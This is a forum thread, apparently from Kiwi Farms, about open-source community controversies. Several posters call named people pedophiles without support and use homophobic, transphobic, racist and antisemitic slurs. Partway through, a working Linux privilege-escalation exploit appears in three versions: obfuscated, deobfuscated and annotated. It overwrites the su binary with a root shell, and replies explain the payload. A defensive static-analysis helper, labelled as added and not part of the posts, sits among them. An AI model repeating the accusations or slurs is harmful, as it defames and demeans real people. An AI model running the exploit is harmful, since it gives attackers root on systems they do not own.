Open Source Software Community - it's about ethics in Code of Conducts

So there is an Albanian Epstein trafficking underage Albanian girls, paid for by Open Source organizations like GNOME and Debian? Very insightful post, you appear to have extensive knowledge of corruption and questionable going ons in Open Source. You're at the right place sharing this.
I've scanned through a few random articles on his site and there's a lot of schizophrenia (over emphasis on calendrology and random imagery) embedded in it but other than that seems like pretty normal debian alogging.
 
cyan links on a white background is horrific.

edit: this is some PREMIUM schizo rambling my guy. Some/most/all of it may be true but ain't nobody gonna read all of it., Presumably you registered here because you found us discussing Jeremy in this thread a few times. He's a known quantity, IIRC Canonical fired him but debian didn't. If it got picked up on more mainstream sites such as techradar, the register (etc etc) then maybe something will happen but otherwise debian seem happy to keep their pedophile on the books.

@Markass the Worst pinging you so you see it, i know you've been interested in jeremy in the past. Archive of the post here just in case https://ghostarchive.org/archive/Z7hWW
The name Pocock rings a bell. I remember this guy sperging on the FSF Europe lists years ago, though I don't quite remember about what and sadly it seems like the mailing list archives are only available through random archives rather than a well-indexed host. This made me lel though:
Daniel Pocock said:
As the last[1] man standing for democracy in FSFE, I propose [...]
 
Hi Drew! I'm happy to know you keep tuning in to check if we're referring to you by your proper title, that being Drew "Lolicon/Pedophile" DeVault, and rest assured, we are! Just so you know, nobody hates you because of stupid things you said forever ago, they hate you because you are an insufferable douchebag nu-male manchild that cannot stop gargling rotting tranny ditch, Drew, that's why. Case in point:
That said, apologies alone aren’t enough. I believe in restorative justice, in growing and mending wounds and repairing harm done, and I set myself seriously to this task over many years. I have gone to therapy, spoken with close friends about it, and taken structural action as well: I have founded support groups and worked one-on-one with many of the people whose politics and behavior I object to. I want an amicable end to bigotry and bullying, for bigots and bullies like my former self to look forward to, to provide a path that doesn’t require them to double down. It’s not easy, and not everyone manages, but I have to look at myself and see the path I’ve taken and imagine that it’s possible, because what’s left for the likes of me if not?

This part of my past brings me a great deal of shame, and that shame motivates me to grow as a person. In a certain sense, it is an ironic, cruel privilege to have had so much cause to reflect on myself, to drive me to question myself and my ideas, and become a much better person with much more defensible ideas. It has driven me to study feminism, social justice, racial justice, intersectionality, LGBTQ theory, antifascism, and to find the intersections in my own life and strive to act out of a more legitimate sense of justice.

I’m often still a firebrand, but I’ve chosen much better hills to die on. My passion is invested in making a more just world, building safe and healthy communities, elevating my peers, and calling for justice and a just society. I have taken the lessons I have learned and tried to share them with other people, and to stand up for what I can now say I know is right, both online and in real life. Through a process of learning, reflection, and humility, I acknowledge that I have done a lot of harm in my youth. To repair this harm, I have committed myself to doing more than enough good now to make sure that the world is a better place when all is said and done. That’s what justice means to me when I turn my principles inwards and hold myself accountable.
The only hill you will die on is being impaled on Dong Gone and his associates' riven cocks, Drew, and certainly not that of justice in any sense. You are, and always were, a cowardly faggot that uses corrupt means like codes of conduct to try and force people into doing something they are unwilling to do, because even if you've never touched a child for real, you are and always will be a spiritual chomo. GRIM. (L. A.)

Addressing the harassment


Kiwi Farms is a web forum that facilitates the discussion and harassment of online figures and communities. Their targets are often subject to organized group trolling and stalking, as well as doxing and real-life harassment. Kiwi Farms has been tied to the suicides of three people who were victims of harassment by the website.
Wikipedia: Kiwi Farms


About three years ago, a thread on Kiwi Farms was opened about me. In the years since, it has grown to about 1,200 posts full of bigots responding to anything and everything I do online with scorn, slurs, and overt bigotry. The thread is full of resources to facilitate harassment, including, among other things, all of my social media profiles, past and present, a history of my residential addresses, my phone numbers, details about my family members, a list of my usernames and password hashes from every leaked database of websites I have accounts on, and so on. Most of my articles or social media posts are archived on Kiwi Farms and then subjected to the most bigoted rebuttals you can imagine. Honestly, it’s mostly just… pathetic. But it’s a problem when it escapes containment, and it’s designed to.

Kiwi Farms is the most organized corner of the harassment which comes my way, but it comes in many forms. On Mastodon, for example, before I deleted my account I would often receive death threats, or graphic images and videos of violence against minorities. I have received a lot of hate and death threats over email, too, several of which I confess that I took some pleasure in forwarding to the sender’s employer.

One of the motivations for this harassment is to “milk” me for “drama”. The idea is to get my hackles up, make me fearful for my safety, and alienate me from my communities, with the hope that it will trigger an entertaining meltdown. Maybe people respond poorly to this kind of harassment – that’s the idea, really – and it often makes the situation worse. Responding to it can legitimize the abuse, elevate it into the discourse, draw more attention to it, and stoke the flames. It can make the victim look bad when they respond emotionally to harassment designed to evoke negative emotions. I have left it unaddressed for a long time in order to subvert this goal, and address it now with a cool head in a relatively quiet period in the harassment campaign.

The harassment waxes and wanes over time, usually picking up whenever I write a progressive blog post that gets some reach. It really took off after a series of incidents in which I called for the Hyprland community and its maintainers to be held to account for the bigotry and harassment on their Discord server (1, 2) and when I spoke out against Richard Stallman’s prolific and problematic public statements regarding the sexual abuse of minors (3).

The abuse crescendoed in October of 2024, when I was involved in editing The Stallman Report. The report is a comprehensive analysis of Richard Stallman’s problematic political discourse regarding sexual harassment, sexual assault, and the sexual abuse of minors, and it depends almost entirely on primary sources – quotes from Stallman’s website which remain online and have not been retracted to this day. The purpose of the report was to make a clear and unassailable case for Stallman’s removal from positions of power, make specific recommendations to address the underlying problems, and to stimulate a period of reflection and reform in the FOSS community. It didn’t achieve much, in the end: the retaliation from Stallman’s defenders was fiercer and more devoted than the support from those who saw the report’s sense.

Myself and the other authors asserted our moral rights to publish anonymously, motivated by our wish to reduce our exposure to the exact sort of harassment I’ve been subjected to over the years. However, I was careless in my opsec during the editing process, and it was possible to plausibly link me to the report as a result, leading to a sharp increase in harassment.


This brings me to a retaliatory, defamatory “report” published about me in the style of the Stallman Report. This report is, essentially, a distillation of the Kiwi Farms thread on me, sanitized of overt bigotry and presented in a readily linkable form in order to stalk me around the internet and enable harassment. It’s used to discredit anything I do online and push for my exclusion from online communities, by dropping the link on Hacker News, Reddit, GitHub or Codeberg issues, etc, anywhere myself or my work is mentioned, or used to discredit the Stallman Report by discrediting one of its unmasked authors.

The report is pretty obviously written in bad faith and relies on a lot of poor arguments to make the case that I’m a misogynist and a pedophile, charges I deny. It also accuses me of being a hypocrite, which I acknowledge in general terms, because, well, who isn’t. The key thing I want people who encounter this report to keep in mind is that this is the “polite” face of an organized harassment campaign.

Most reasonable readers easily dismiss the report because it is rather transparent in its bad faith. However, someone who reads it in good faith, just trying to do their due diligence, might come away from it with some reasonable concerns. Consider the following quote from my long-deleted Reddit account, /u/sircmpwn:

I’m of the opinion that 14 year old girls should be required to have an IUD installed. Ten years of contraception that requires a visit to the doctor to remove prematurely.

This comment was written 13 years ago, and I don’t stand by what I wrote. I was 19 at the time, and I was a moron. My mother had me when she was 23 years old, and the abuse I suffered at her hands during my childhood was severe, and I generalized this experience to all women. When I wrote this comment, I was one year removed from the abuse, living alone and in poverty, and early in a life-long process of coming to terms with the abuse and figuring out how to be a well-adjusted adult after 18 long years of abuse and isolation.

But an explanation is not an excuse. This comment was reprehensible, as were many of the awful ideas I held at the time. Many years later, I can recognize that this comment is misogynistic, denies the agency of children and women over their own bodies, disparages the many, many mothers who do a wonderful job raising children in difficult circumstances, and is based in argumentation which can reasonably be related to eugenics. This comment was just awful – there’s a reason this was deleted. I apologize to anyone who read it at the time, or comes across it now, and is justifiably insulted.

I don’t feel that it’s necessary to rebuke most of the report. But, there is a grain of truth in the report, the grain of truth that led me to retract my shitty Reddit comments and reflect on myself, and that grain of truth is this: in early adulthood, I was a huge asshole.


I have had more than my fair share of harmful ignorance, bad takes, sexism and misogyny, transphobic and homophobic beliefs, and worse. Moreover, I have verbally abused many people and made many of my own arguments in bad faith to support bad conclusions. Some of the people who read this will recall having found themselves at the wrong end of my verbal abuse and harassment.

It’s important for me to take responsibility for this period of my life, and in dismissing bad faith criticisms of myself to carefully avoid dismissing good faith criticisms in the same fell swoop.

I’m not really sure how to deal with this part of my life appropriately. I have apologized to a few people individually, but it’s not a scalable solution and with many people I have no business re-opening wounds to salve my own conscience. I can offer a general apology, and I will. I’ve never found the right moment to say it, but now will do: I apologise, sincerely, to everyone who I have harmed with verbal abuse and with hateful and problematic rhetoric. If you have had a bad experience or experiences with me, and there’s anything you want from me that can help you heal from that experience – a personal apology, for example – please reach out to me and ask.

That said, apologies alone aren’t enough. I believe in restorative justice, in growing and mending wounds and repairing harm done, and I set myself seriously to this task over many years. I have gone to therapy, spoken with close friends about it, and taken structural action as well: I have founded support groups and worked one-on-one with many of the people whose politics and behavior I object to. I want an amicable end to bigotry and bullying, for bigots and bullies like my former self to look forward to, to provide a path that doesn’t require them to double down. It’s not easy, and not everyone manages, but I have to look at myself and see the path I’ve taken and imagine that it’s possible, because what’s left for the likes of me if not?

This part of my past brings me a great deal of shame, and that shame motivates me to grow as a person. In a certain sense, it is an ironic, cruel privilege to have had so much cause to reflect on myself, to drive me to question myself and my ideas, and become a much better person with much more defensible ideas. It has driven me to study feminism, social justice, racial justice, intersectionality, LGBTQ theory, antifascism, and to find the intersections in my own life and strive to act out of a more legitimate sense of justice.

I’m often still a firebrand, but I’ve chosen much better hills to die on. My passion is invested in making a more just world, building safe and healthy communities, elevating my peers, and calling for justice and a just society. I have taken the lessons I have learned and tried to share them with other people, and to stand up for what I can now say I know is right, both online and in real life. Through a process of learning, reflection, and humility, I acknowledge that I have done a lot of harm in my youth. To repair this harm, I have committed myself to doing more than enough good now to make sure that the world is a better place when all is said and done. That’s what justice means to me when I turn my principles inwards and hold myself accountable.


So where do we go from here?

The response to my progressive beliefs and activism is reactionary backlash, doxing, harassment, and death threats targeting me and my family, all of which is likely to escalate in response to this post, and none of which is defensible. On the other hand, I understand that the consequences for my own reactionary past is, in some cases, alienation – and, honestly, fair enough.

But I don’t want you to confuse my honest faults with the defamation and harassment I endure for standing up for my honest strengths. If you feel generous and optimistic about who I am today, and you recognize my growth, and wish for an ally in the fight for what’s right, your good faith and solidarity mean the world to me. I would appreciate it if you would express your support and rebuke harassment when you see it, and help keep me honest as I continue a life-long process of learning and growth.

If I’ve hurt you, and you want to seek reconciliation, I make myself available to you for that purpose. If I’ve hurt you, and you simply don’t care to be hurt again, I’m sorry – I understand where you’re coming from, and have made my peace with it.

Please send words of support and/or death threats to drew@ddevault.org.

Thank you.
 

FUUUUUUUUUCK YOU FUCKING FUCKS.
All of Linux is broken, because of CUNTING FUCKS changing the name of “MASTER” branch on repos because it’s white supremacist or something.

Fuck OFF. Thank you for your attention to this matter.
 
I'm watching the latest (((Lunduke))) video right now and, considering that he is a Jew, this section in the middle is stunningly un-self-aware. Or very self-aware.

I'll transcribe it so you can raise your eyebrows together with me:

One group making themselves incompatible with other groups, primarily out of a desire to destroy those other groups. Now, of course, this is not unique to the world of tech, right? We've seen this all over the place. Leftist activists have a tendency to take these same approaches in many industries, governments, organizations all over the map. Just as a few examples, the government of Iran declares as an official policy 'death to America' and 'America is the great Satan!', thus rendering the government of Iran in its current state incompatible with the government of the USA, right? It's hard to be compatible, it's hard to work together when one group says 'our goal is your death'. It's hard to be compatible, right?
Likewise, many Islamic nations, as official policy, punish converting to Christianity by putting converts to death. Several Islamic nations do this. Thus rendering those Islamic nations incompatible with Christianity and with Christian-friendly cultures. And this seems pretty obvious to me, when there is a single group that says 'bad group over there! They must die'. Well, clearly they're not going to be compatible now. It's hard to get along when one group wants the other group dead.​
And as you look over so many such examples, something stands out. It is almost always - not always, but almost - one group who demands that the other group submits or changes or dies. Well, at the same time, the others that are being attacked and banned, they tend to go out of their way to find compromise, right? Over and over again, the groups that are being attacked tend to be the ones that want to work with those who are attacking and banning them, to find a middle ground. And such is the case in the world of tech. Conservatives will work with the leftists without a second thought, while the leftist activists attack and ban conservatives.​
 
Yes. It is essentially just a local privesc, with a fancy name.
We have those all the time so nothing new.

This weird trend of giving sploits cutesy names with their own logos and web pages is goofy. I don't know what's the point of it. Also, this is how I learned that .fail is a TLD now, of all fucking things.

But yeah, it requires local access to the machine. If you don't have people with accounts on the machine which you haven't already trusted with sudo or if your server is already locked down so that you can only shell in with private keys, or if your server isn't doing retarded shit like running files untrusted users upload as executables, you don't need to sweat this.

Another thing that frustrates me is that the PoC Python script is obfuscated (even more so than Python already is lol), right down to decompressing a string literal, the same way you'd see these sorts of scripts in the wild on hacked web sites. How are you supposed to analyze this shit and see what it's actually doing? What's the point of doing this on the web site which is supposed to be explaining what a huge threat this is and how it works?

Python:
#!/usr/bin/env python3
import os as g,zlib,socket as s
def d(x):return bytes.fromhex(x)
def c(f,t,c):
 a=s.socket(38,5,0);a.bind(("aead","authencesn(hmac(sha256),cbc(aes))"));h=279;v=a.setsockopt;v(h,1,d('0800010000000010'+'0'*64));v(h,5,None,4);u,_=a.accept();o=t+4;i=d('00');u.sendmsg([b"A"*4+c],[(h,3,i*4),(h,2,b'\x10'+i*19),(h,4,b'\x08'+i*3),],32768);r,w=g.pipe();n=g.splice;n(f,w,o,offset_src=0);n(r,u.fileno(),o)
 try:u.recv(8+t)
 except:0
f=g.open("/usr/bin/su",0);i=0;e=zlib.decompress(d("78daab77f57163626464800126063b0610af82c101cc7760c0040e0c160c301d209a154d16999e07e5c1680601086578c0f0ff864c7e568f5e5b7e10f75b9675c44c7e56c3ff593611fcacfa499979fac5190c0c0c0032c310d3"))
while i<len(e):c(f,i,e[i:i+4]);i+=4
g.system("su")

I asked a robot to deobfuscate it and got this, for what it's worth:

Python:
#!/usr/bin/env python3

import os
import zlib
import socket

def hex_to_bytes(hex_string):
    return bytes.fromhex(hex_string)

def write_chunk(fd, offset, data):

    alg_socket = socket.socket(38, 5, 0)
    alg_socket.bind(("aead", "authencesn(hmac(sha256),cbc(aes))"))

    SOL_ALG = 279
    setsockopt = alg_socket.setsockopt

    setsockopt(SOL_ALG, 1, hex_to_bytes('0800010000000010' + '0' * 64))
    setsockopt(SOL_ALG, 5, None, 4)

    conn, _ = alg_socket.accept()
    total_len = offset + 4

    zero_byte = hex_to_bytes('00')
    conn.sendmsg(
        [b"A" * 4 + data],
        [
            (SOL_ALG, 3, zero_byte * 4),
            (SOL_ALG, 2, b'\x10' + zero_byte * 19),
            (SOL_ALG, 4, b'\x08' + zero_byte * 3),
        ],
        32768,
    )

    pipe_r, pipe_w = os.pipe()
    splice = os.splice
    splice(fd, pipe_w, total_len, offset_src=0)
    splice(pipe_r, conn.fileno(), total_len)

    try:
        conn.recv(8 + offset)
    except:
        0

fd = os.open("/usr/bin/su", 0)

index = 0
payload = zlib.decompress(
    hex_to_bytes(
        "78daab77f57163626464800126063b0610af82c101cc7760c0040e0c160c301"
        "d209a154d16999e07e5c1680601086578c0f0ff864c7e568f5e5b7e10f75b96"
        "75c44c7e56c3ff593611fcacfa499979fac5190c0c0c0032c310d3"
    )
)

while index < len(payload):
    write_chunk(fd, index, payload[index : index + 4])
    index += 4

os.system("su")

So in a loop we open a socket, configure it, and dump some data into it, and a file handler to the su bin is involved in a way I don't follow. I tried de-hexing that compressed string into a file, and while file recognizes it as zlib-compressed data, gunzip can't uncompress it, so I don't know if I'm fucking something up or if it's just weirdly compressed.

Well, whatever. Lock down your systems, ladies and gents.
 
right down to decompressing a string literal
Still does that in your cleaned up version, and I assume because it's some standard shellcode that compresses well.

As for why they did it: they wanted to brag about how small it was but they were retarded, so they got the gangster computer god to codegolf for them in Python instead of writing a proper small exploit themselves (looks perfect for a Perl oneliner).
 
This weird trend of giving sploits cutesy names with their own logos and web pages is goofy. I don't know what's the point of it.
Generating PR for the guys who found it. Everybody wants to be the next Heartbleed.
I tried de-hexing that compressed string into a file, and while file recognizes it as zlib-compressed data, gunzip can't uncompress it, so I don't know if I'm fucking something up or if it's just weirdly compressed.
gunzip expects gzip-compressed data, not zlib-compressed data (the difference is the header and the checksum). The data is an ELF binary that starts /bin/sh. Effectively, you're replacing su with a shell that has suid set, meaning it runs as root even when not invoked by root.
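The zlib-versus-gzip point in the answer above, as an added example that is not part of the original posts: a static triage helper that identifies the wrapper from its header bytes, inflates it in memory, names and checks the trailer checksum, and reads the ELF header and printable strings without writing or running anything. The sample blobs are constructed here (a bare ELF64 header plus one harmless string), and all function and variable names are hypothetical.

```python
import gzip
import re
import struct
import zlib

ELF_TYPES = {1: "ET_REL", 2: "ET_EXEC", 3: "ET_DYN", 4: "ET_CORE"}
ELF_MACHINES = {3: "x86", 40: "ARM", 62: "x86-64", 183: "AArch64"}


def container_type(blob):
    """Classify a DEFLATE wrapper by its header bytes (RFC 1950 / RFC 1952)."""
    if blob[:2] == b"\x1f\x8b":
        return "gzip"
    # zlib: compression method 8 in the low nibble, and the 16-bit header
    # must be a multiple of 31. A blob starting "78 da" passes this check.
    if len(blob) >= 2 and blob[0] & 0x0F == 8 and ((blob[0] << 8) | blob[1]) % 31 == 0:
        return "zlib"
    return "unknown"


def gunzip_rejects(blob):
    """True when a gzip reader refuses the blob, as gunzip did in the thread."""
    try:
        gzip.decompress(blob)
    except (OSError, EOFError, zlib.error):
        return True
    return False


def inflate(blob):
    """Decompress in memory only; the result is never written out or executed."""
    kind = container_type(blob)
    if kind == "gzip":
        return gzip.decompress(blob)
    if kind == "zlib":
        return zlib.decompress(blob)
    raise ValueError("not a zlib or gzip stream")


def trailer_checksum(blob, data):
    """Name and verify the integrity trailer, the other place the formats differ."""
    if container_type(blob) == "zlib":  # 4-byte big-endian Adler-32
        return "adler32", struct.unpack(">I", blob[-4:])[0] == zlib.adler32(data)
    # gzip: little-endian CRC-32 followed by the uncompressed length mod 2**32
    crc, size = struct.unpack("<II", blob[-8:])
    return "crc32", crc == zlib.crc32(data) and size == (len(data) & 0xFFFFFFFF)


def parse_elf_header(data):
    """Read class, byte order, type, machine and entry point from e_ident onward."""
    if len(data) < 24 or data[:4] != b"\x7fELF":
        raise ValueError("not an ELF image")
    bits = {1: 32, 2: 64}.get(data[4])
    endian = {1: "<", 2: ">"}.get(data[5])
    if bits is None or endian is None:
        raise ValueError("bad EI_CLASS or EI_DATA")
    e_type, e_machine = struct.unpack_from(endian + "HH", data, 16)
    entry_fmt = endian + ("Q" if bits == 64 else "I")
    if len(data) < 24 + struct.calcsize(entry_fmt):
        raise ValueError("truncated ELF header")
    (e_entry,) = struct.unpack_from(entry_fmt, data, 24)
    return {
        "bits": bits,
        "type": ELF_TYPES.get(e_type, hex(e_type)),
        "machine": ELF_MACHINES.get(e_machine, hex(e_machine)),
        "entry": e_entry,
    }


def triage(blob):
    """Full static report for a compressed blob pulled out of a script."""
    data = inflate(blob)
    report = parse_elf_header(data)
    report["container"] = container_type(blob)
    report["checksum"] = trailer_checksum(blob, data)
    report["size"] = len(data)
    report["strings"] = [s.decode() for s in re.findall(rb"[\x20-\x7e]{4,}", data)]
    return report


# Constructed sample: a 64-byte ELF64 header and one benign string, no code.
SAMPLE_ELF = (
    b"\x7fELF" + bytes([2, 1, 1, 0]) + bytes(8)
    + struct.pack("<HHIQQQIHHHHHH", 2, 62, 1, 0x400078, 64, 0, 0, 64, 56, 1, 64, 0, 0)
    + b"/bin/true\x00"
)
SAMPLE_ZLIB = zlib.compress(SAMPLE_ELF, 9)
SAMPLE_GZIP = gzip.compress(SAMPLE_ELF)

if __name__ == "__main__":
    print("gunzip rejects zlib sample:", gunzip_rejects(SAMPLE_ZLIB))
    print(triage(SAMPLE_ZLIB))
```
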
 
Another thing that frustrates me is that the PoC Python script is obfuscated (even more so than Python already is lol), right down to decompressing a string literal, the same way you'd see these sorts of scripts in the wild on hacked web sites. How are you supposed to analyze this shit and see what it's actually doing? What's the point of doing this on the web site?
Codegolfing stuff
Lemme make it more readable by hand, except I couldn't be arsed to finish the job completely, so have roughly 80% disambiguated:

Python:
#!/usr/bin/env python3
import os, zlib, socket
def c(setuid_root_executable, current_position, payload):
    template_socket = socket.socket(
        family=socket.AF_ALG,
        type=socket.SOCK_SEQPACKET,
        proto=0
    )
    template_socket.bind((
        "aead", # authenticated encryption with associated data
        "authencesn(hmac(sha256),cbc(aes))" # AES-CBC encryption, ESN variant
    ))
    template_socket.setsockopt(
        level=socket.SOL_ALG,
        optname=socket.ALG_SET_KEY,
        value=bytes.fromhex('0800010000000010'+'0'*64) # metadata says AES encryption key length is 16 bytes, followed by 32 bytes of total key material, essentially keys of all zero
    )
    template_socket.setsockopt(
        level=socket.SOL_ALG,
        optname=socket.ALG_SET_AEAD_AUTHSIZE,
        None,
        4
    )
    operation_socket, _ = template_socket.accept()
    zero = bytes.fromhex('00')
    operation_socket.sendmsg(
        buffers=[b"AAAA"+payload],
        ancdata=[(279,3,zero*4),(279,2,b'\x10'+zero*19),(279,4,b'\x08'+zero*3),]
        flags=32768
    )
    readpipe, writepipe = os.pipe()
    os.splice(
        src=setuid_root_executable,
        dst=writepipe,
        count=current_position+4,
        offset_src=0
    )
    os.splice(
        src=readpipe,
        dst=operation_socket.fileno(),
        count=current_position+4)
    try:
        operation_socket.recv(8+current_position)
    except:
        0
setuid_root_executable = os.open("/usr/bin/su", os.O_RDONLY)
current_position = 0
small_64bit_linux_ELF_binary = zlib.decompress(bytes.fromhex("78daab77f57163626464800126063b0610af82c101cc7760c0040e0c160c301d209a154d16999e07e5c1680601086578c0f0ff864c7e568f5e5b7e10f75b9675c44c7e56c3ff593611fcacfa499979fac5190c0c0c0032c310d3")) # this is a 160 byte ELF executable that seemingly attempts to call setuid(0), execute /bin/sh, and exit if that fails
while current_position < len(small_64bit_linux_ELF_binary):
    c(setuid_root_executable, current_position, small_64bit_linux_ELF_binary[i:i+4])
    current_position += 4
os.system("su")

The use of integers to refer to option names is seriously silly, but par for the course
 
I want to learn how to write C/C# code just so I could make highly important drivers for highly important codebases, just to eventually add a +NIGGER license before a major update that needs it to function, just to piss everyone off that uses it.
 
It's fine. Systemd is objectively good group of software. You get timers, journal, systemd-boot, run0 and so much more.

Like even for Artixbros a few years ago, their only real argument against it was "it is bloat". Now half of them have moved to better distros while the other half is blindly obeying their master Jewduke.
Man, "Lundjew" was right there, RIGHT THERE, and you fucking fumbled it.

You fucking suck, man.
 

FUUUUUUUUUCK YOU FUCKING FUCKS.
All of Linux is broken, because of CUNTING FUCKS changing the name of “MASTER” branch on repos because it’s white supremacist or something.

Fuck OFF. Thank you for your attention to this matter.
Oh, it's way worse than that depending on the project, they will even change long-standing variable names just for brownie points.
 
This weird trend of giving sploits cutesy names with their own logos and web pages is goofy. I don't know what's the point of it. Also, this is how I learned that .fail is a TLD now, of all fucking things.
Not even a theme-song.
I don't know about you guys but if they can't even make the effort to create a theme-song or jingle I can not take the exploit seriously.
You have to up your game.

If you don't take the exploit serious enough to make a theme-song I will not take it serious either.
 
Yet they still have cumsum.

Its even worse because they now broke the namig convention used by matlab. These are older functions and their names come from the fact that at the time they were introduced, it was common to shorten names like that. If you see "cumtrapz" and think about tranny porn that's a problem with your brain, it was never meant to stand for anything lewd.
 
Not even a theme-song.
I don't know about you guys but if they can't even make the effort to create a theme-song or jingle I can not take the exploit seriously.
You have to up your game.

If you don't take the exploit serious enough to make a theme-song I will not take it serious either.
Giving them cool names and showcases adds to the Mythology of the Hacker, so to speak, it gives them this almost legendary character that I feel is essential to Internet and or hacker culture. And its fun. I'd much rather read about "TotaLniggeRobliteratoR" than CVE-2026-05-01-18751923507135
 
Giving them cool names and showcases adds to the Mythology of the Hacker, so to speak, it gives them this almost legendary character that I feel is essential to Internet and or hacker culture. And its fun. I'd much rather read about "TotaLniggeRobliteratoR" than CVE-2026-05-01-18751923507135
"Mythology of the Hacker" died with antisec. When you're not spending your zerodays on popping "security researchers" so you can humiliate them by posting their private files and communications online you've lost your sovl (and replacing Mitnick's site with "all aboard the mantrain" was trve art, and publishing the contents of "anonymous"' server was hilarious).
 